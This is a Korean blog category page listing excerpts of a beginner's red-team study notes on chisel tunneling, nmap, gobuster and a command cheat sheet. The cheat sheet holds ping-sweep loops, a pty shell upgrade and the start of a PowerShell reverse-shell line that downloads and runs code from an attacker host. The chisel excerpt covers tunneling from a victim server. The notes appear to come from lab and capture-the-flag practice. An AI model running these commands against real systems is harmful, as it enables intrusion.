레드팀/시스템 명령어 (4) 썸네일형 리스트형 해킹 왕초보가 공부하는 명령어 - chisel Chisel 포트를 연결해주는 터널링 툴. 덕분에 서버의 ~포트에 취약점이 뻔하게 있지만 공격하려면 로컬에서 접근해야 할 때, 유용하게 사용된다. 기존에 metasploit의 portfwd를 사용했는데, 최근 portfwd는 안되고 chisel만 되던 문제를 발견해서 뭔가 차이점이 있을거라고 생각했다. 차이점은 발견하지 못했고, 앞으로는 그냥 두 터널링 각각 해볼 생각! 사용 chisel은 서버에 클라이언트에서 각각 열어줘야 하는 도구이다. 그런 이유로, python -m http.server [port]를 사용하던 scp를 사용하던 해서 chisel 도구를 victim 서버에도 옮겨줘야 한다. 원격 서버에서 chisel server을 열어준다. ./chisel server --port [~~] --re.. 기타 명령어 다시 한 번 찾게 된 자주 쓰는 명령줄 모음 Ping Sweep 윈도우 for /L %i in (1 1 254) do for /L %j in (1 1 254) do @ping 172.16.%i.%j -n 1 -w 100 > nul && echo 172.16.%i.%j is up 리눅스 for i in {1..254} ; do (ping -c 1 172.16.1.$i | grep "bytes from" &); done 파이썬 명령어 예쁜 쉘 얻기 python3 -c "import pty; pty.spawn('/bin/bash')" 임시로 서버 열기 python -m http.server [port] 리버스 쉘 윈도우 "powershell -command IEX(IWR http://[공격자 pc1]:8080.. 해킹 왕초보가 공부하는 명령어 - gobuster Gobuster? 웹 디렉토리 브루트 포싱 툴! https://www.google.com/robots.txt 같이 메인 주소 뒤에 슬레시를 두어 이어지는 디렉토리들이 있다. 개발자가 UI의 버튼을 이용해서 대부분의 경로로 접근할 수 있게 해주지만, 몇몇 디렉토리는 버튼으로 연결되어 있지 않다. /robots.txt 같은 경로가 그 예시인데 robots.txt는 워낙 유명하지만 "관리자만 아는 경로"가 있다면 또 어떨까. 예를 들어 ~~~/admin으로 이어지는 경로를 숨겨놨었다면? 그런 내용을 이 gobuster가 찾아준다. hackthebox start point에서 처음으로 만난 친구인데, 쉬운 난이도의 머신에서는 종종 필요하다. 이 포스팅에서는 그 중 내가 알고있는 dir과 vhost만 소개한다. .. 해킹 왕초보가 공부하는 명령어 - Nmap Nmap 이라.. 처음에 ip가 주어지면 어떤 포트가 열려있는지 확인하는 스캐너! (혹은 여러 ip 중 어떤 ip가 열려있는 지 확인도 가능) 이름부터 어렵게 생긴 명령어다. 나는 예전부터 map이 들어있는 모든 단어를 어려워했기에 Nmap 또한 어려울거라고 확신했었다. 사실, 이 명령어 생김새 하나 때문에 1년 전에 이 공부를 시작하려다가 포기했었다. 인터넷에 검색했다가 어~~~~~마무시하게 많은 옵션들을 봐버렸다고... 그래, 그러니 사실상 해킹을 처음 공부하는 데 있어서 첫 번째 관문인 셈! 1. nmap [ip] 그런데 인터넷에 검색해서 나오는 그 많은 옵션들 전부 알 필요 없이 사실 그냥 nmap 다음에 ip를 적으면 작동이 된다. 위 사진처럼 뒤에 ip만 넣으면 어떤 포트가 열려있는지 스캔해준.. 이전 1 다음
